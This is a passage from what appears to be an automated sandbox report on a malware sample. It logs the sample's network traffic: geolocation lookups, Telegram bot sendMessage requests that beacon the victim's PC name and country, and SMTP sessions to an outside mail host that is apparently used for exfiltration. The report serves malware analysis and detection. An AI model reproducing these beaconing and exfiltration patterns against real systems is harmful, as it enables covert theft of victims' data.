                                                                                                                                                                        2025-01-06 06:53:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        24192.168.2.449805149.154.167.2204433980C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:52 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:52 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:52 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                        2025-01-06 06:53:52 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        25192.168.2.449806188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:53 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        2025-01-06 06:53:53 UTC855INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:53 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461222
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3t9IssWEQrgEAXivn3hrhFcJG9wwUGFh450KIzFzgGI2W8F3jNBdCEQmXCsbT%2BCFkmmsUWkp9ore8UdqFUlUnKX97t1ccM72Oy041f8d%2FtG%2BgSqhRgX9HOF1hPQEOXKW8U2LDr0m"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb271c1543bf-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1577&min_rtt=1565&rtt_var=611&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1757977&cwnd=252&unsent_bytes=0&cid=dffaa2a6f7435315&ts=167&x=0"
                                                                                                                                                                        2025-01-06 06:53:53 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        26192.168.2.449808188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:55 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:55 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461224
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=93fSb1Hj%2Fv%2BWX09lSradzreG0GQIubhIrVD5kjlAgWSA7hC20L392jA%2FCQBvrDR8OyT%2BcNC6GrFv3SCTnt1MG6qDrYC5VSGSYInnG7s2CTEnJ7z6cowkQa%2BnlElBcVAUECeLd9PG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb338f5942eb-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1677&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1684939&cwnd=211&unsent_bytes=0&cid=25f5b8dc023f8f21&ts=158&x=0"
                                                                                                                                                                        2025-01-06 06:53:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        27192.168.2.449811188.114.96.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:56 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:56 UTC853INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:56 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461226
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qg6%2BxanPb6i95O%2FNwh6Y0XIv6CtSXI5v8JeWKu2shpR6C8pWRtdkgYC6jAxhN9mmgg5rJieF35cencrdqgxcbTw2qOXP6ISh01rBhgTOHXwGo7piBFLsDr8EVRxt1kCZfgHu9iF0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb3e7c807c81-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2064&min_rtt=2060&rtt_var=782&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1391801&cwnd=241&unsent_bytes=0&cid=566489cd0ea50773&ts=149&x=0"
                                                                                                                                                                        2025-01-06 06:53:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        28192.168.2.449814188.114.97.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:57 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:58 UTC864INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:58 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461227
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOPQFHg%2FatYa5mBT64yezQYtdiCrSBQdQUJWwQyj0ftk1puT6rtXfrxGmjr4vbGI4bgszkdNJ%2FaWI7g1PSt4LDrXJUhjI4YLRY%2FZzUjovcI4eUA%2BqMnXSi1%2BT9%2B6qzXp3sG8%2B%2F8N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb45eabe433a-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1683&rtt_var=646&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1676234&cwnd=32&unsent_bytes=0&cid=aa69b79b1f96e6fc&ts=161&x=0"
                                                                                                                                                                        2025-01-06 06:53:58 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        29192.168.2.449816188.114.97.34437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:53:59 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                        Host: reallyfreegeoip.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:53:59 UTC859INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:53:59 GMT
                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                        Content-Length: 362
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Age: 1461228
                                                                                                                                                                        Cache-Control: max-age=31536000
                                                                                                                                                                        cf-cache-status: HIT
                                                                                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yWNrGirkq6Ec8UZmgtIe%2FV5uFZWFHG2W5WOhprbxGPayRCUlgcdG%2FRIYfSbNOvyQYhqiiQuupuywBMIlGUEgBtHsbi9UUG0nm74iuDMzU6h%2F%2BAv%2F9wKPyTz9wJPvC6gw11tusVZx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8fd9cb4d79768c12-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1860&min_rtt=1858&rtt_var=701&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1555673&cwnd=177&unsent_bytes=0&cid=035c7dfeee7419b1&ts=146&x=0"
                                                                                                                                                                        2025-01-06 06:53:59 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        30192.168.2.449818149.154.167.2204437692C:\Users\Public\Libraries\npratlsN.pif
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2025-01-06 06:54:00 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                        Host: api.telegram.org
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        2025-01-06 06:54:00 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                        Server: nginx/1.18.0
                                                                                                                                                                        Date: Mon, 06 Jan 2025 06:54:00 GMT
                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                        Content-Length: 55
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                        2025-01-06 06:54:00 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                        Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                        SMTP Packets

                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                                                        Jan 6, 2025 07:53:49.856524944 CET5874979646.151.208.21192.168.2.4220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:53:52 +0300
                                                                                                                                                                        Jan 6, 2025 07:53:49.857033014 CET49796587192.168.2.446.151.208.21EHLO 536720
                                                                                                                                                                        Jan 6, 2025 07:53:50.139569998 CET5874979646.151.208.21192.168.2.4250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
                                                                                                                                                                        Jan 6, 2025 07:53:50.256346941 CET49796587192.168.2.446.151.208.21STARTTLS
                                                                                                                                                                        Jan 6, 2025 07:53:50.523679972 CET5874979646.151.208.21192.168.2.4220 TLS go ahead
                                                                                                                                                                        Jan 6, 2025 07:53:56.804439068 CET5874980946.151.208.21192.168.2.4220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:53:59 +0300
                                                                                                                                                                        Jan 6, 2025 07:53:56.804683924 CET49809587192.168.2.446.151.208.21EHLO 536720
                                                                                                                                                                        Jan 6, 2025 07:53:57.093535900 CET5874980946.151.208.21192.168.2.4250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
                                                                                                                                                                        Jan 6, 2025 07:53:57.096580982 CET49809587192.168.2.446.151.208.21STARTTLS
                                                                                                                                                                        Jan 6, 2025 07:53:57.367635965 CET5874980946.151.208.21192.168.2.4220 TLS go ahead
                                                                                                                                                                        Jan 6, 2025 07:54:00.223993063 CET5874981746.151.208.21192.168.2.4220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:03 +0300
                                                                                                                                                                        Jan 6, 2025 07:54:00.224208117 CET49817587192.168.2.446.151.208.21EHLO 536720
                                                                                                                                                                        Jan 6, 2025 07:54:00.506345987 CET5874981746.151.208.21192.168.2.4250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
                                                                                                                                                                        Jan 6, 2025 07:54:00.506644011 CET49817587192.168.2.446.151.208.21STARTTLS
                                                                                                                                                                        Jan 6, 2025 07:54:00.772526026 CET5874981746.151.208.21192.168.2.4220 TLS go ahead
                                                                                                                                                                        Jan 6, 2025 07:54:06.459235907 CET5874984546.151.208.21192.168.2.4220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:09 +0300
                                                                                                                                                                        Jan 6, 2025 07:54:06.459461927 CET49845587192.168.2.446.151.208.21EHLO 536720
                                                                                                                                                                        Jan 6, 2025 07:54:06.743177891 CET5874984546.151.208.21192.168.2.4250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
                                                                                                                                                                        Jan 6, 2025 07:54:06.743597031 CET49845587192.168.2.446.151.208.21STARTTLS
                                                                                                                                                                        Jan 6, 2025 07:54:07.031544924 CET5874984546.151.208.21192.168.2.4220 TLS go ahead
                                                                                                                                                                        Jan 6, 2025 07:54:07.671569109 CET5874985546.151.208.21192.168.2.4220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:10 +0300
                                                                                                                                                                        Jan 6, 2025 07:54:07.672250032 CET49855587192.168.2.446.151.208.21EHLO 536720
                                                                                                                                                                        Jan 6, 2025 07:54:07.956434965 CET5874985546.151.208.21192.168.2.4250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
                                                                                                                                                                        Jan 6, 2025 07:54:07.956732035 CET49855587192.168.2.446.151.208.21STARTTLS
                                                                                                                                                                        Jan 6, 2025 07:54:08.224337101 CET5874985546.151.208.21192.168.2.4220 TLS go ahead
                                                                                                                                                                        Jan 6, 2025 07:54:13.893156052 CET5874989246.151.208.21192.168.2.4220 host.ibtikarat.net ESMTP Exim 4.98 Mon, 06 Jan 2025 09:54:16 +0300
                                                                                                                                                                        Jan 6, 2025 07:54:13.893332005 CET49892587192.168.2.446.151.208.21EHLO 536720
                                                                                                                                                                        Jan 6, 2025 07:54:14.178177118 CET5874989246.151.208.21192.168.2.4250-host.ibtikarat.net Hello 536720 [8.46.123.189]
                                                                                                                                                                        250-SIZE 52428800
                                                                                                                                                                        250-LIMITS MAILMAX=100 RCPTMAX=150
                                                                                                                                                                        250-8BITMIME
                                                                                                                                                                        250-PIPELINING
                                                                                                                                                                        250-PIPECONNECT
                                                                                                                                                                        250-AUTH PLAIN LOGIN
                                                                                                                                                                        250-STARTTLS
                                                                                                                                                                        250 HELP
                                                                                                                                                                        Jan 6, 2025 07:54:14.178481102 CET49892587192.168.2.446.151.208.21STARTTLS
                                                                                                                                                                        Jan 6, 2025 07:54:14.969419956 CET5874989246.151.208.21192.168.2.4220 TLS go ahead

                                                                                                                                                                        Statistics

                                                                                                                                                                        CPU Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        Memory Usage

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                        Behavior

                                                                                                                                                                        Click to jump to process

                                                                                                                                                                        System Behavior

                                                                                                                                                                        General

                                                                                                                                                                        Target ID:0
                                                                                                                                                                        Start time:01:53:05
                                                                                                                                                                        Start date:06/01/2025
                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                        File size:1'620'872 bytes
                                                                                                                                                                        MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
